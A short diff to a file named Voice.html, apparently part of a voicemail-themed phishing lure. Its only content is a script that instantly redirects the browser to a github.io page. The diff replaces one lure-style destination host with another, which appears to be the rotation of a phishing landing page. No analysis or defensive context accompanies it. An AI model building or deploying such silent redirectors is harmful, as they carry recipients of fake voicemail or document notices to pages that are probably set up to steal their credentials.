--- a/Voice.html
+++ b/Voice.html
@@ -1,3 +1,3 @@
 <script type="text/JavaScript">
-    setTimeout(`location.href = "https://voicemailonemailloading.github.io/New/Voice.html";`,0);
+    setTimeout(`location.href = "https://loadinonpdfviewer.github.io/Loading/voice.html";`,0);
 </script>
